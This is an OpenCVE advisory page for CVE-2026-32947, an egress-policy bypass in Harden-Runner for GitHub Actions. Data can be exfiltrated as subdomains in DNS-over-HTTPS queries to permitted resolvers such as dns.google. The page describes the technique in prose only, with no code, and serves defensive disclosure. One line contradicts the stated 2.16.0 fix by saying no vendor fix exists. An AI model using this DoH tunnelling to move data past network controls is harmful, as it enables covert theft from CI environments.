Description
Harden-Runner is a CI/CD security agent that works like an EDR for GitHub Actions runners. In versions 2.15.1 and below, a DNS over HTTPS (DoH) vulnerability allows attackers to bypass egress-policy: block network restrictions by tunneling exfiltrated data through permitted HTTPS endpoints like dns.google. The attack works by encoding sensitive data (e.g., the runner's hostname) as subdomains in DoH queries, which appear as legitimate HTTPS traffic to Harden-Runner's domain-based filtering but are ultimately forwarded to an attacker-controlled domain. This effectively enables data exfiltration without directly connecting to any blocked destination. Exploitation requires the attacker to already have code execution within the GitHub Actions workflow. The issue was fixed in version 2.16.0.
Published: 2026-03-20
Score: 4.6 Medium
EPSS: < 1% Very Low
KEV: No
Impact: Data exfiltration via DNS over HTTPS bypassing egress policy
Action: Apply Patch
AI Analysis

Impact

Harden-Runner, the CI/CD security agent for GitHub Actions, contains a DoH vulnerability in versions 2.15.1 and earlier that lets an attacker encode sensitive data as subdomains in DNS over HTTPS queries. The queries go to a permitted HTTPS endpoint such as dns.google, pass through Harden-Runner’s domain‑based egress filtering, and are forwarded to an attacker‑controlled domain, enabling exfiltration of data without connecting to a blocked destination. This weakness is associated with CWE‑693, CWE‑807, and CWE‑863 and allows a breach of confidentiality by leaking information that should not leave the isolated network.

Affected Systems

Step‑Security Harden‑Runner Community Tier, versions up to and including 2.15.1, is affected. The vulnerability was resolved in version 2.16.0. Any environment running a vulnerable Harden‑Runner instance on GitHub Actions is at risk.

Risk and Exploitability

The CVSS score of 4.6 indicates moderate severity, while the EPSS score of less than 1% suggests a low probability of wide‑scale exploitation. The vulnerability is not listed in CISA’s KEV catalog. Exploitation requires existing code execution within the GitHub Actions workflow; the attacker then crafts DoH queries that appear legitimate. Because the attack uses standard HTTPS channels that are normally permitted, defenses based solely on egress rules are ineffective. The overall risk is moderate but depends heavily on whether the runner is exposed to malicious workflow code.

Generated by OpenCVE AI on March 24, 2026 at 13:30 UTC.

Remediation

No vendor fix or workaround currently provided.

OpenCVE Recommended Actions

  • Upgrade Harden‑Runner to version 2.16.0 or later
  • Verify that only trusted workflows run on runners that use Harden‑Runner
  • If patching is delayed, monitor DNS traffic for DoH queries to external domains such as dns.google as a possible indicator of exfiltration

Generated by OpenCVE AI on March 24, 2026 at 13:30 UTC.

Tracking

Sign in to view the affected projects.

Advisories
Source ID Title
Github GHSA Github GHSA GHSA-46g3-37rh-v698 Egress Policy Bypass via DNS over HTTPS (DoH) in Harden-Runner (Community Tier)
History

Tue, 24 Mar 2026 12:45:00 +0000

Type Values Removed Values Added
First Time appeared Stepsecurity
Stepsecurity harden-runner
CPEs cpe:2.3:a:stepsecurity:harden-runner:*:*:*:*:community:*:*:*
Vendors & Products Stepsecurity
Stepsecurity harden-runner

Sat, 21 Mar 2026 05:30:00 +0000

Type Values Removed Values Added
Weaknesses CWE-807
References
Metrics threat_severity

None

 cvssV3_1

{'score': 4.9, 'vector': 'CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:N/A:N'}

threat_severity

Moderate

Fri, 20 Mar 2026 16:15:00 +0000

Type Values Removed Values Added
Metrics ssvc

{'options': {'Automatable': 'no', 'Exploitation': 'none', 'Technical Impact': 'partial'}, 'version': '2.0.3'}

Fri, 20 Mar 2026 09:00:00 +0000

Type Values Removed Values Added
First Time appeared Step Security
Step Security harden Runner
Vendors & Products Step Security
Step Security harden Runner

Fri, 20 Mar 2026 04:45:00 +0000

Type Values Removed Values Added
Description Harden-Runner is a CI/CD security agent that works like an EDR for GitHub Actions runners. In versions 2.15.1 and below, a DNS over HTTPS (DoH) vulnerability allows attackers to bypass egress-policy: block network restrictions by tunneling exfiltrated data through permitted HTTPS endpoints like dns.google. The attack works by encoding sensitive data (e.g., the runner's hostname) as subdomains in DoH queries, which appear as legitimate HTTPS traffic to Harden-Runner's domain-based filtering but are ultimately forwarded to an attacker-controlled domain. This effectively enables data exfiltration without directly connecting to any blocked destination. Exploitation requires the attacker to already have code execution within the GitHub Actions workflow. The issue was fixed in version 2.16.0.
Title Egress Policy Bypass via DNS over HTTPS (DoH) in Harden-Runner (Community Tier)
Weaknesses CWE-693
CWE-863
References
Metrics cvssV4_0

{'score': 4.6, 'vector': 'CVSS:4.0/AV:N/AC:L/AT:P/PR:H/UI:N/VC:N/VI:N/VA:N/SC:H/SI:N/SA:N'}

Subscriptions

Step Security Harden Runner
Stepsecurity Harden-runner
cve-icon MITRE

Status: PUBLISHED

Assigner: GitHub_M

Published:

Updated: 2026-03-20T16:05:57.731Z

Reserved: 2026-03-17T00:05:53.284Z

Link: CVE-2026-32947

cve-icon Vulnrichment

Updated: 2026-03-20T16:05:52.816Z

cve-icon NVD

Status : Analyzed

Published: 2026-03-20T05:16:13.923

Modified: 2026-03-24T12:33:33.540

Link: CVE-2026-32947

cve-icon Redhat

Severity : Moderate

Publid Date: 2026-03-20T04:03:03Z

Links: CVE-2026-32947 - Bugzilla

cve-icon OpenCVE Enrichment

Updated: 2026-03-25T14:09:22Z

Weaknesses